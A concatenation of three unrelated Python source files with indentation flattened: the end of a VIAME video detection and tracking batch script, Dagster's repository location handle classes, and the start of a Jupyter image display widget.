if len( options.archive_width ) > 0:
return list(itertools.chain(
fset( 'kwa_writer:fixed_col_count=' + options.archive_width ),
fset( 'kwa_writer:fixed_row_count=' + options.archive_height ),
))
return []
def object_detector_settings_list( options ):
if len( options.detection_threshold ) > 0:
return list( itertools.chain(
fset( 'detector:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector1:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector2:detector:darknet:thresh=' + options.detection_threshold ),
fset( 'detector_filter:filter:class_probablity_filter:threshold=' + options.detection_threshold ),
))
return []
def object_tracker_settings_list( options ):
if len( options.tracker_threshold ) > 0:
return list( itertools.chain(
fset( 'track_initializer:track_initializer:threshold:'
'filter:class_probablity_filter:threshold=' + options.tracker_threshold ),
fset( 'tracker:detection_select_threshold=' + options.tracker_threshold ),
))
return []
def video_frame_rate_settings_list( options ):
output = []
if len( options.input_frame_rate ) > 0:
output += fset( 'input:frame_time=' + str( 1.0 / float( options.input_frame_rate ) ) )
if len( options.frame_rate ) > 0:
output += fset( 'downsampler:target_frame_rate=' + options.frame_rate )
if len( options.batch_size ) > 0:
output += fset( 'downsampler:burst_frame_count=' + options.batch_size )
if len( options.batch_skip ) > 0:
output += fset( 'downsampler:burst_frame_break=' + options.batch_skip )
return output
def groundtruth_reader_settings_list( options, gt_files, basename, gpu_id, gt_type ):
output = []
if len( gt_files ) == 0:
exit_with_error( "Directory " + basename + " contains no GT files" )
elif len( gt_files ) > 1:
exit_with_error( "Directory " + basename + " contains multiple GT files" )
else:
if gpu_id > 0:
output_extension = str( gpu_id ) + '.lbl'
else:
output_extension = 'lbl'
lbl_file = options.input_dir + "/labels.txt"
if not os.path.exists( lbl_file ):
lbl_file = "labels.txt"
output += fset( 'detection_reader:file_name=' + gt_files[0] )
output += fset( 'detection_reader:reader:type=' + gt_type )
output += fset( 'write_descriptor_ids:category_file=' + lbl_file )
output += fset( 'write_descriptor_ids:output_directory=' + options.output_directory )
output += fset( 'write_descriptor_ids:output_extension=' + output_extension )
return output
def remove_quotes( input_str ):
return input_str.replace( "\"", "" )
def add_final_list_csv( args, video_list ):
if len( video_list ) == 0:
return
for video in video_list:
if video.endswith( "_part0.txt" ):
output_file = video_list[0].replace( "_part0.txt", detection_ext )
output_stream = open( output_file, "w" )
id_adjustment = 0
is_first = True
used_ids = set()
last_id = 0
input_stream = open( video.replace( ".txt", detection_ext ), "r" )
id_mappings = dict()
for line in input_stream:
if len( line ) > 0 and ( line[0] == '#' or line[0:9] == 'target_id' ):
if is_first:
output_stream.write( line )
continue
parsed_line = line.rstrip().split(',')
if len( parsed_line ) < 2:
continue
orig_id = int( parsed_line[0] )
if orig_id in id_mappings:
final_id = id_mappings[ orig_id ]
elif orig_id in used_ids:
last_id = last_id + 1
final_id = last_id
id_mappings[ orig_id ] = final_id
used_ids.add( final_id )
else:
final_id = orig_id
id_mappings[ orig_id ] = orig_id
used_ids.add( orig_id )
last_id = max( last_id, final_id )
parsed_line[0] = str( final_id )
parsed_line[2] = str( int( parsed_line[2] ) + id_adjustment )
output_stream.write( ','.join( parsed_line ) + '\n' )
id_adjustment = id_adjustment + file_length( video )
input_stream.close()
is_first = False
# Process a single video
def process_video_kwiver( input_name, options, is_image_list=False, base_ovrd='',
cpu=0, gpu=None, write_track_time=True ):
if gpu is None:
gpu = 0
multi_threaded = ( options.gpu_count * options.pipes > 1 )
auto_detect_gt = ( len( options.auto_detect_gt ) > 0 )
input_basename = os.path.basename( input_name )
input_ext = os.path.splitext( input_name )[1]
if multi_threaded:
log_info( 'Processing: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Processing: {} on GPU... '.format( input_basename ) )
# Get video name without extension and full path
if len( base_ovrd ) > 0:
basename_no_ext = base_ovrd
else:
basename_no_ext = os.path.splitext( input_basename )[0]
# Formulate input setting string
if auto_detect_gt:
if options.auto_detect_gt == 'habcam' or 'csv' in options.auto_detect_gt:
gt_ext = '.csv'
elif options.auto_detect_gt[0] != '.':
gt_ext = '.' + options.auto_detect_gt
else:
gt_ext = options.auto_detect_gt
if not is_image_list and \
( input_ext == '.csv' or input_ext == '.txt' or input_name == "__pycache__" ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif not os.path.exists( input_name ):
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
elif os.path.isdir( input_name ):
if auto_detect_gt:
gt_files = list_files_in_dir_w_ext( input_name, gt_ext )
input_name = make_filelist_for_dir( input_name, options.output_directory, basename_no_ext )
if len( input_name ) == 0:
if multi_threaded:
log_info( 'Skipped {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Skipped' + lb1 )
return
is_image_list = True
elif auto_detect_gt:
input_path = os.path.dirname( os.path.abspath( input_name ) )
gt_files = list_files_in_dir_w_ext( input_path, gt_ext )
# Formulate command
input_settings = fset( 'input:video_filename=' + input_name )
if not is_image_list:
input_settings += fset( 'input:video_reader:type=vidl_ffmpeg' )
elif options.ts_from_file:
input_settings += fset( 'input:video_reader:type=add_timestamp_from_filename' )
command = ( get_pipeline_cmd( options.debug ) +
[ find_file( options.pipeline ) ] +
input_settings )
command += video_frame_rate_settings_list( options )
command += video_output_settings_list( options, basename_no_ext )
command += archive_dimension_settings_list( options )
command += object_detector_settings_list( options )
command += object_tracker_settings_list( options )
if options.write_svm_info and not auto_detect_gt:
if len( options.input_detections ) == 0:
exit_with_error( "Input detections must be specified to write out svm header info" )
if not os.path.exists( options.input_detections ):
exit_with_error( "Unable to find input detections" )
gt_files = [ options.input_detections ]
if auto_detect_gt or options.write_svm_info:
gt_type = options.auto_detect_gt if auto_detect_gt else "viame_csv"
command += groundtruth_reader_settings_list( options, gt_files, basename_no_ext, gpu, gt_type )
if write_track_time:
command += fset( 'track_writer:writer:viame_csv:write_time_as_uid=true' )
command += fset( 'detector_writer:writer:viame_csv:write_time_as_uid=true' )
else:
command += fset( 'track_writer:writer:viame_csv:stream_identifier=' + input_basename )
command += fset( 'detector_writer:writer:viame_csv:stream_identifier=' + input_basename )
if len( options.input_detections ) > 0:
command += fset( "detection_reader:file_name=" + options.input_detections )
try:
if len( options.extra_settings ) > 0:
for extra_option in options.extra_settings:
command += fset( " ".join( extra_option ) )
except:
pass
# Process command, possibly with logging
log_base = ""
if len( options.log_directory ) > 0 and not options.debug and options.log_directory != "PIPE":
log_base = options.output_directory + div + options.log_directory + div + basename_no_ext
with get_log_output_files( log_base ) as kwargs:
res = execute_command( command, gpu=gpu, **kwargs )
else:
res = execute_command( command, gpu=gpu )
global any_video_complete
if res == 0:
if multi_threaded:
log_info( 'Completed: {} on GPU {}'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Success' + lb1 )
any_video_complete = True
else:
if multi_threaded:
log_info( 'Failure: {} on GPU {} Failed'.format( input_basename, gpu ) + lb1 )
else:
log_info( 'Failure' + lb1 )
if res == -11:
s = os.statvfs( options.output_directory )
if s.f_bavail * s.f_frsize < 100000000:
exit_with_error( lb1 + 'Out of disk space. Clean up space and then re-run.' )
log_info( lb1 + 'Pipeline failed with code 11. This is typically indicative of an '
'issue with system resources, e.g. low disk space or running out of '
'memory, but could be indicative of a pipeline issue. It\'s also possible '
'the pipeline you are running just had a shutdown issue. Attempting to '
'continue processing.' + lb1 )
any_video_complete = True
if not any_video_complete:
if len( log_base ) > 0:
exit_with_error( 'Processing failed, check ' + log_base + '.txt, terminating.' )
else:
exit_with_error( 'Processing failed, terminating.' )
elif len( log_base ) > 0:
log_info( lb1 + 'Check ' + log_base + '.txt for error messages' + lb2 )
# Main Function
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description="Process new videos",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-v", dest="input_video", default="",
help="Input single video to process")
parser.add_argument("-d", dest="input_dir", default="",
help="Input directory of videos or image folders to process")
parser.add_argument("-l", dest="input_list", default="",
help="Input list of image files to process")
parser.add_argument("-p", dest="pipeline", default=default_pipeline,
help="Input pipeline for processing video or image data")
parser.add_argument("-s", dest="extra_settings", action='append', nargs='*',
help="Extra command line arguments for the pipeline runner")
parser.add_argument("-id", dest="input_detections", default="",
help="Input detections around which to create descriptors")
parser.add_argument("-o", dest="output_directory", default=".",
help="Output directory to store files in")
parser.add_argument("-logs", dest="log_directory", default="logs",
help="Output sub-directory for log files, if empty will not use files")
parser.add_argument("-video-exts", dest="video_exts", default="3qp;3g2;amv;asf;avi;drc;gif;gifv;"
"f4v;f4p;f4a;f4bflv;m4v;mkv;mp4;m4p;m4v;mpg;mpg2;mp2;mpeg;mpe;mpv;mng;mts;"
"m2ts;mov;mxf;nsv;ogg;ogv;qt;roq;rm;rmvb;svi;webm;wmv;vob;yuv",
help="Allowable video extensions")
parser.add_argument("-image-exts", dest="image_exts", default="bmp;dds;gif;heic;jpg;jpeg;png;psd;"
"psp;pspimage;tga;thm;tif;tiff;yuv",
help="Allowable image extensions")
parser.add_argument("-frate", dest="frame_rate", default="",
help="Processing frame rate over-ride to process videos at, specified "
"in hertz (frames per second)" )
parser.add_argument("-fbatch", dest="batch_size", default="",
help="Optional number of frames to process in batches")
parser.add_argument("-fskip", dest="batch_skip", default="",
help="If batching frames, number of frames to skip between batches")
parser.add_argument("-ifrate", dest="input_frame_rate", default="",
help="Input frame rate over-ride to process videos at. This is useful "
"for specifying the frame rate of input image lists, which typically "
"don't have frame rates")
parser.add_argument("-detection-threshold", dest="detection_threshold", default="",
help="Optional detection threshold over-ride parameter")
parser.add_argument("-tracker-threshold", dest="tracker_threshold", default="",
help="Optional tracking threshold over-ride parameter")
parser.add_argument("-archive-height", dest="archive_height", default="",
help="Advanced: Optional video archive height over-ride")
parser.add_argument("-archive-width", dest="archive_width", default="",
help="Advanced: Optional video archive width over-ride")
parser.add_argument("-gpus", "--gpu-count", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("-pipes-per-gpu", "--pipes", default=1, type=int, metavar='N',
help="Parallelize the ingest by using the first N GPUs in parallel")
parser.add_argument("--detection-plots", dest="detection_plots", action="store_true",
help="Produce per-video detection plot summaries")
parser.add_argument("--track-plots", dest="track_plots", action="store_true",
help="Produce per-video track plot summaries")
parser.add_argument("-plot-objects", dest="objects", default="fish",
help="Objects to generate plots for")
parser.add_argument("-plot-threshold", dest="plot_threshold", default=0.25, type=float,
help="Threshold to generate plots for")
parser.add_argument("-plot-smooth", dest="smooth", default=1, type=int,
help="Smoothing factor for plots")
parser.add_argument("-auto-detect-gt", dest="auto_detect_gt", default="",
help="Automatically pass to pipes GT of this type if present")
parser.add_argument("--init-db", dest="init_db", action="store_true",
help="Re-initialize database")
parser.add_argument("--build-index", dest="build_index", action="store_true",
help="Build searchable index on completion")
parser.add_argument("--ball-tree", dest="ball_tree", action="store_true",
help="Use a ball tree for the searchable index")
parser.add_argument("--no-reset-prompt", dest="no_reset_prompt", action="store_true",
help="Don't prompt if the output folder should be reset")
parser.add_argument("--ts-from-file", dest="ts_from_file", action="store_true",
help="Attempt to retrieve timestamps from image filenames.")
parser.add_argument("--write-svm-info", dest="write_svm_info", action="store_true",
help="Write out header information used for training SVMs")
parser.add_argument("--debug", dest="debug", action="store_true",
help="Run with debugger attached to process")
parser.add_argument("-install", dest="install_dir", default="",
help="Optional install dir over-ride for all application "
"binaries. If this is not specified, it is expected that all "
"viame binaries are already in our path.")
args = parser.parse_args()
# Assorted error checking up front
process_data = True
number_input_args = sum(len(inp_x) > 0 for inp_x in [args.input_video, args.input_dir, args.input_list])
if number_input_args == 0 or args.pipeline == no_pipeline:
if not args.build_index and not args.detection_plots and not args.track_plots:
exit_with_error( "Either input video or input directory must be specified" )
else:
process_data = False
elif number_input_args > 1:
exit_with_error( "Only one of input video, directory, or list should be specified, not more" )
if ( args.detection_plots or args.track_plots ) and len( args.frame_rate ) == 0:
exit_with_error( "Must specify frame rate if generating detection or track plots" )
signal.signal( signal.SIGINT, signal_handler )
# Initialize database
if args.init_db:
if len( args.log_directory ) > 0:
init_log_file = args.output_directory + div + args.log_directory + div + "database_log.txt"
else:
init_log_file = ""
db_is_init, user_select = database_tool.init( log_file=init_log_file, prompt=(not args.no_reset_prompt) )
if not db_is_init:
if user_select:
log_info( "User decided to not initialize new database, shutting down." + lb2 )
sys.exit( 0 )
elif len( args.log_directory ) > 0:
exit_with_error( "Unable to initialize database, check " + init_log_file + lb2 +
"You may have another database running on your system, or ran "
"a failed operation in the past and need to re-log or restart." )
else:
exit_with_error( "Unable to initialize database" )
log_info( lb1 )
# Call processing pipelines on all input data
if process_data:
# Handle output directory creation if necessary
if len( args.output_directory ) > 0:
recreate_dir = ( not args.init_db and not args.no_reset_prompt )
prompt_user = ( not args.no_reset_prompt )
create_dir( args.output_directory, logging=False, recreate=recreate_dir, prompt=prompt_user )
if len( args.log_directory ) > 0:
create_dir( args.output_directory + div + args.log_directory, logging=False )
# Identify all videos to process
if len( args.input_list ) > 0:
if args.gpu_count > 1:
video_list = split_image_list( args.input_list, args.gpu_count, args.output_directory )
else:
video_list = [ args.input_list ]
is_image_list = True
elif len( args.input_dir ) > 0:
video_list = list_videos_in_dir( args.input_dir, args.video_exts )
is_image_list = False
else:
video_list = [ args.input_video ]
is_image_list = False
if len( video_list ) == 0:
exit_with_error( "No videos found for ingest in given folder, exiting." )
elif not is_image_list:
if not args.init_db:
log_info( lb1 )
video_str = " video" if len( video_list ) == 1 else " videos"
log_info( "Processing " + str( len( video_list ) ) + video_str + lb2 )
elif not args.build_index:
log_info( lb1 )
# Check for local pipelines and pre-reqs present
if "_local.pipe" in args.pipeline:
if not os.path.exists( "category_models/detector.pipe" ):
if has_file_with_extension( "category_models", "svm" ):
if args.pipeline.endswith( "detector_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "detector_svm_models.pipe" )
elif args.pipeline.endswith( "full_frame_classifier_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "full_frame_classifier_svm.pipe" )
elif args.pipeline.endswith( "tracker_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "tracker_svm_models.pipe" )
else:
exit_with_error( "Use of this script requires training a detector first" )
else:
exit_with_error( "Use of this script requires training a detector first" )
# Process videos in parallel, one per GPU
video_queue = queue.Queue()
for video_name in video_list:
if os.path.isfile( video_name ) or os.path.isdir( video_name ):
video_queue.put( video_name )
else:
log_info( "Skipping unknown input: " + video_name + lb )
def process_video_thread( gpu, cpu ):
while True:
try:
video_name = video_queue.get_nowait()
except queue.Empty:
break
process_video_kwiver( video_name, args, is_image_list,
cpu=cpu, gpu=gpu, write_track_time=not is_image_list )
gpu_thread_list = [ i for i in range( args.gpu_count ) for _ in range( args.pipes ) ]
cpu_thread_list = list( range( args.pipes ) ) * args.gpu_count
threads = [ threading.Thread( target = process_video_thread, args = (gpu,cpu,) )
for gpu, cpu in zip( gpu_thread_list, cpu_thread_list ) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if is_image_list:
if args.gpu_count > 1: # Each thread outputs 1 list, add multiple
add_final_list_csv( args, video_list )
for image_list in video_list: # Clean up after split_image_list
os.unlink( image_list )
if not video_queue.empty():
exit_with_error( "Some videos were not processed!" )
# Build out detection vs time plots for both detections and tracks
if args.detection_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for detections" )
detection_plot_dir = os.path.join( args.output_directory, "detection_plots" )
create_dir( detection_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
detection_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = detection_ext, top_category_only = False )
if args.track_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for tracks" )
track_plot_dir = os.path.join( args.output_directory, "track_plots" )
create_dir( track_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
track_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = track_ext, top_category_only = True )
if args.detection_plots or args.track_plots:
log_info( lb1 )
# Build searchable index
if args.build_index:
log_info( lb1 + "Building searchable index" + lb2 )
if len( args.log_directory ) > 0 and args.log_directory != "PIPE":
index_log_file = args.output_directory + div + args.log_directory + div + "smqtk_indexer.txt"
else:
index_log_file = ""
if args.ball_tree:
print( "Warning: building a ball tree is deprecated" )
if not database_tool.build_standard_index( remove_quotes( args.install_dir ),
log_file = index_log_file ):
exit_with_error( "Unable to build index" )
# Output complete message
if os.name == 'nt':
log_info( lb1 + "Processing complete, close this window before launching any GUI." + lb2 )
else:
log_info( lb1 + "Processing complete" + lb2 )
|
handle.py
|
import sys
import threading
from abc import ABCMeta, abstractmethod
from collections import namedtuple
from enum import Enum
import six
from dagster import check
from dagster.api.list_repositories import sync_list_repositories, sync_list_repositories_grpc
from dagster.core.code_pointer import CodePointer
from dagster.core.errors import DagsterInvariantViolationError
from dagster.core.host_representation.selector import PipelineSelector
from dagster.core.origin import RepositoryGrpcServerOrigin, RepositoryPythonOrigin
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
# This is a hard-coded name for the special "in-process" location.
# This is typically only used for test, although we may allow
# users to load user code into a host process as well. We want
# to encourage the user code to be in user processes as much
# as possible since that it how this system will be used in prod.
# We used a hard-coded name so that we don't have to create
# made up names for this case.
IN_PROCESS_NAME = "<<in_process>>"
def _assign_grpc_location_name(port, socket, host):
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.str_param(host, "host")
check.invariant(port or socket)
return "grpc:{host}:{socket_or_port}".format(
host=host, socket_or_port=(socket if socket else port)
)
def _assign_python_env_location_name(repository_code_pointer_dict):
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
)
if len(repository_code_pointer_dict) > 1:
raise DagsterInvariantViolationError(
"If there is one than more repository you must provide a location name"
)
return next(iter(repository_code_pointer_dict.keys()))
# Which API the host process should use to communicate with the process
# containing user code
class UserProcessApi(Enum):
# Execute via the command-line API
CLI = "CLI"
# Connect via gRPC
GRPC = "GRPC"
class RepositoryLocationHandle(six.with_metaclass(ABCMeta)):
@abstractmethod
def create_reloaded_handle(self):
pass
def cleanup(self):
pass
@staticmethod
def create_in_process_location(pointer):
check.inst_param(pointer, "pointer", CodePointer)
# If we are here we know we are in a hosted_user_process so we can do this
from dagster.core.definitions.reconstructable import repository_def_from_pointer
repo_def = repository_def_from_pointer(pointer)
return InProcessRepositoryLocationHandle(IN_PROCESS_NAME, {repo_def.name: pointer})
@staticmethod
def create_python_env_location(
loadable_target_origin,
location_name,
user_process_api=UserProcessApi.CLI,
use_python_package=False,
):
check.inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_str_param(location_name, "location_name")
check.bool_param(use_python_package, "use_python_package")
if user_process_api == UserProcessApi.GRPC:
return RepositoryLocationHandle.create_process_bound_grpc_server_location(
loadable_target_origin=loadable_target_origin, location_name=location_name
)
response = sync_list_repositories(
executable_path=loadable_target_origin.executable_path,
python_file=loadable_target_origin.python_file,
module_name=loadable_target_origin.module_name,
working_directory=loadable_target_origin.working_directory,
attribute=loadable_target_origin.attribute,
)
if loadable_target_origin.python_file:
repository_code_pointer_dict = {
lrs.repository_name: CodePointer.from_python_file(
loadable_target_origin.python_file,
lrs.attribute,
loadable_target_origin.working_directory,
)
for lrs in response.repository_symbols
}
elif use_python_package:
repository_code_pointer_dict = {
lrs.repository_name: CodePointer.from_python_package(
loadable_target_origin.module_name, lrs.attribute
)
for lrs in response.repository_symbols
}
else:
repository_code_pointer_dict = {
lrs.repository_name: CodePointer.from_module(
loadable_target_origin.module_name, lrs.attribute
)
for lrs in response.repository_symbols
}
return PythonEnvRepositoryLocationHandle(
location_name=location_name
if location_name
else _assign_python_env_location_name(repository_code_pointer_dict),
loadable_target_origin=loadable_target_origin,
repository_code_pointer_dict=repository_code_pointer_dict,
)
@staticmethod
def create_process_bound_grpc_server_location(loadable_target_origin, location_name):
from dagster.grpc.client import client_heartbeat_thread
from dagster.grpc.server import GrpcServerProcess
server = GrpcServerProcess(
loadable_target_origin=loadable_target_origin, max_workers=2, heartbeat=True
)
client = server.create_ephemeral_client()
heartbeat_shutdown_event = threading.Event()
heartbeat_thread = threading.Thread(
target=client_heartbeat_thread, args=(client, heartbeat_shutdown_event)
)
heartbeat_thread.daemon = True
heartbeat_thread.start()
list_repositories_response = sync_list_repositories_grpc(client)
code_pointer_dict = list_repositories_response.repository_code_pointer_dict
return ManagedGrpcPythonEnvRepositoryLocationHandle(
loadable_target_origin=loadable_target_origin,
executable_path=list_repositories_response.executable_path,
location_name=location_name
if location_name
else _assign_python_env_location_name(code_pointer_dict),
repository_code_pointer_dict=code_pointer_dict,
client=client,
grpc_server_process=server,
heartbeat_thread=heartbeat_thread,
heartbeat_shutdown_event=heartbeat_shutdown_event,
)
@staticmethod
def create_grpc_server_location(port, socket, host, location_name=None):
from dagster.grpc.client import DagsterGrpcClient
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.str_param(host, "host")
check.opt_str_param(location_name, "location_name")
client = DagsterGrpcClient(port=port, socket=socket, host=host)
list_repositories_response = sync_list_repositories_grpc(client)
repository_names = set(
symbol.repository_name for symbol in list_repositories_response.repository_symbols
)
return GrpcServerRepositoryLocationHandle(
port=port,
socket=socket,
host=host,
location_name=location_name
if location_name
else _assign_grpc_location_name(port, socket, host),
client=client,
repository_names=repository_names,
)
class GrpcServerRepositoryLocationHandle(
namedtuple(
"_GrpcServerRepositoryLocationHandle",
"port socket host location_name client repository_names",
),
RepositoryLocationHandle,
):
"""
Represents a gRPC server that Dagster is not responsible for managing.
"""
def __new__(cls, port, socket, host, location_name, client, repository_names):
from dagster.grpc.client import DagsterGrpcClient
return super(GrpcServerRepositoryLocationHandle, cls).__new__(
cls,
check.opt_int_param(port, "port"),
check.opt_str_param(socket, "socket"),
check.str_param(host, "host"),
check.str_param(location_name, "location_name"),
check.inst_param(client, "client", DagsterGrpcClient),
check.set_param(repository_names, "repository_names", of_type=str),
)
def create_reloaded_handle(self):
return RepositoryLocationHandle.create_grpc_server_location(
self.port, self.socket, self.host, self.location_name
)
def get_current_image(self):
job_image = self.client.get_current_image().current_image
if not job_image:
raise DagsterInvariantViolationError(
"Unable to get current image that GRPC server is running. Please make sure that "
"env var DAGSTER_CURRENT_IMAGE is set in the GRPC server and contains the most "
"up-to-date user code image and tag. Exiting."
)
return job_image
def get_repository_python_origin(self, repository_name):
check.str_param(repository_name, "repository_name")
list_repositories_reply = self.client.list_repositories()
repository_code_pointer_dict = list_repositories_reply.repository_code_pointer_dict
if repository_name not in repository_code_pointer_dict:
raise DagsterInvariantViolationError(
"Unable to find repository name {} on GRPC server.".format(repository_name)
)
code_pointer = repository_code_pointer_dict[repository_name]
return RepositoryPythonOrigin(
executable_path=list_repositories_reply.executable_path or sys.executable,
code_pointer=code_pointer,
)
class PythonEnvRepositoryLocationHandle(
namedtuple(
"_PythonEnvRepositoryLocationHandle",
"loadable_target_origin location_name repository_code_pointer_dict",
),
RepositoryLocationHandle,
):
def __new__(cls, loadable_target_origin, location_name, repository_code_pointer_dict):
return super(PythonEnvRepositoryLocationHandle, cls).__new__(
cls,
check.inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
),
check.str_param(location_name, "location_name"),
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
),
)
@property
def executable_path(self):
return self.loadable_target_origin.executable_path
def create_reloaded_handle(self):
return RepositoryLocationHandle.create_python_env_location(
self.loadable_target_origin, self.location_name,
)
class ManagedGrpcPythonEnvRepositoryLocationHandle(
namedtuple(
"_ManagedGrpcPythonEnvRepositoryLocationHandle",
"loadable_target_origin executable_path location_name repository_code_pointer_dict "
"grpc_server_process client heartbeat_thread heartbeat_shutdown_event",
),
RepositoryLocationHandle,
):
"""
A Python environment for which Dagster is managing a gRPC server.
"""
def __new__(
cls,
loadable_target_origin,
executable_path,
location_name,
repository_code_pointer_dict,
grpc_server_process,
client,
heartbeat_thread,
heartbeat_shutdown_event,
):
from dagster.grpc.client import DagsterGrpcClient
from dagster.grpc.server import GrpcServerProcess
return super(ManagedGrpcPythonEnvRepositoryLocationHandle, cls).__new__(
cls,
check.inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
),
check.str_param(executable_path, "executable_path"),
check.str_param(location_name, "location_name"),
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
),
check.inst_param(grpc_server_process, "grpc_server_process", GrpcServerProcess),
check.inst_param(client, "client", DagsterGrpcClient),
check.inst_param(heartbeat_thread, "heartbeat_thread", threading.Thread),
heartbeat_shutdown_event,
)
@property
def repository_names(self):
return set(self.repository_code_pointer_dict.keys())
@property
def host(self):
return "localhost"
@property
def port(self):
return self.grpc_server_process.port
@property
def socket(self):
return self.grpc_server_process.socket
def create_reloaded_handle(self):
return RepositoryLocationHandle.create_process_bound_grpc_server_location(
self.loadable_target_origin, self.location_name,
)
def cleanup(self):
self.heartbeat_shutdown_event.set()
self.heartbeat_thread.join()
self.client.cleanup_server()
class InProcessRepositoryLocationHandle(
namedtuple("_InProcessRepositoryLocationHandle", "location_name repository_code_pointer_dict"),
RepositoryLocationHandle,
):
def __new__(cls, location_name, repository_code_pointer_dict):
return super(InProcessRepositoryLocationHandle, cls).__new__(
cls,
check.str_param(location_name, "location_name"),
check.dict_param(
repository_code_pointer_dict,
"repository_code_pointer_dict",
key_type=str,
value_type=CodePointer,
),
)
def create_reloaded_handle(self):
raise NotImplementedError("Not implemented for in-process")
class RepositoryHandle(
namedtuple("_RepositoryHandle", "repository_name repository_location_handle")
):
def __new__(cls, repository_name, repository_location_handle):
return super(RepositoryHandle, cls).__new__(
cls,
check.str_param(repository_name, "repository_name"),
check.inst_param(
repository_location_handle, "repository_location_handle", RepositoryLocationHandle
),
)
def get_origin(self):
if isinstance(self.repository_location_handle, InProcessRepositoryLocationHandle):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=sys.executable,
)
elif isinstance(
self.repository_location_handle, PythonEnvRepositoryLocationHandle
) or isinstance(
self.repository_location_handle, ManagedGrpcPythonEnvRepositoryLocationHandle
):
return RepositoryPythonOrigin(
code_pointer=self.repository_location_handle.repository_code_pointer_dict[
self.repository_name
],
executable_path=self.repository_location_handle.executable_path,
)
elif isinstance(self.repository_location_handle, GrpcServerRepositoryLocationHandle):
return RepositoryGrpcServerOrigin(
host=self.repository_location_handle.host,
port=self.repository_location_handle.port,
socket=self.repository_location_handle.socket,
repository_name=self.repository_name,
)
else:
check.failed(
"Can not target represented RepositoryDefinition locally for repository from a {}.".format(
self.repository_location_handle.__class__.__name__
)
)
class PipelineHandle(namedtuple("_PipelineHandle", "pipeline_name repository_handle")):
def __new__(cls, pipeline_name, repository_handle):
return super(PipelineHandle, cls).__new__(
cls,
check.str_param(pipeline_name, "pipeline_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
def to_string(self):
return "{self.location_name}.{self.repository_name}.{self.pipeline_name}".format(self=self)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_pipeline_origin(self.pipeline_name)
def to_selector(self):
return PipelineSelector(self.location_name, self.repository_name, self.pipeline_name, None)
class ScheduleHandle(namedtuple("_ScheduleHandle", "schedule_name repository_handle")):
def __new__(cls, schedule_name, repository_handle):
return super(ScheduleHandle, cls).__new__(
cls,
check.str_param(schedule_name, "schedule_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
def get_origin(self):
return self.repository_handle.get_origin().get_schedule_origin(self.schedule_name)
class PartitionSetHandle(namedtuple("_PartitionSetHandle", "partition_set_name repository_handle")):
def __new__(cls, partition_set_name, repository_handle):
return super(PartitionSetHandle, cls).__new__(
cls,
check.str_param(partition_set_name, "partition_set_name"),
check.inst_param(repository_handle, "repository_handle", RepositoryHandle),
)
@property
def repository_name(self):
return self.repository_handle.repository_name
@property
def location_name(self):
return self.repository_handle.repository_location_handle.location_name
|
DisplayPane.py
|
import bqplot as bq
import ipywidgets as ipy
import cv2
import numpy as np
from threading import Thread
from VisionSystem.DetectionModel import Frame, ColorSpaces
from .Interactor.ResultDisplayer import ResultDisplayer
from .Interactor.DataSetBrowser import DataSetBrowser
from .Interactor.FrameLabeller import FrameLabeller
class DisplayPane(ipy.VBox):
FULL_EXTERNAL_WIDTH = 983
FULL_INTERNAL_WIDTH = 745
FULL_OFFSET = 240
def __init__(self, video_stream=None, img_path=None, img=None, interactors=None, size=0.5, vision_system=None, frame=None,
filter_fn=None, apply_filter_to_vision_system_input=False, update_frame_cbs=None, display_colorspace=ColorSpaces.BGR,
available_space=1, apply_mask=False, dataset=None, **kwargs):
if not (video_stream is not None) ^ (img is not None) ^ (frame is not None) ^ (img_path is not None) ^ (dataset is not None):
raise Exception(
"either path, img or frame must be defined, and not both")
self.bq_img = None
self.raw_frame = None
self.size = size
self.available_space = available_space
self.video_stream = video_stream
self.dataset = dataset
self.togglebutton_group = []
self.interactors = interactors or []
self.vision_system = vision_system
self.filter_fn = filter_fn
self.apply_filter_to_vision_system_input = apply_filter_to_vision_system_input
self.image_plot_scales = {'x': bq.LinearScale(), 'y': bq.LinearScale()}
